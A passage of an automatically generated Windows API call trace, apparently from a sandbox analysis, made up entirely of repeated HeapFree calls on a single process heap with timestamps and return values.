returned 1 [0082.347] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449850 | out: hHeap=0x3f0000) returned 1 [0082.347] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.347] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4498b0 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449910 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420c10 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420c30 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414280 | out: hHeap=0x3f0000) returned 1 [0082.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e3a0 | out: hHeap=0x3f0000) returned 1 [0082.349] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.349] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.350] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e760 | out: hHeap=0x3f0000) returned 1 [0082.350] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420cd0 | out: hHeap=0x3f0000) returned 1 [0082.350] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e730 | out: hHeap=0x3f0000) returned 1 [0082.350] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e700 | out: hHeap=0x3f0000) returned 1 [0082.351] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42f3c0 | out: hHeap=0x3f0000) returned 1 [0082.351] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4457b0 | out: hHeap=0x3f0000) returned 1 [0082.351] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.351] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e7c0 | out: hHeap=0x3f0000) returned 1 [0082.351] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e790 | out: hHeap=0x3f0000) returned 1 [0082.351] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d6c0 | out: hHeap=0x3f0000) returned 1 [0082.351] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.351] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d6f0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e6a0 | out: hHeap=0x3f0000) returned 1 [0082.355] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) 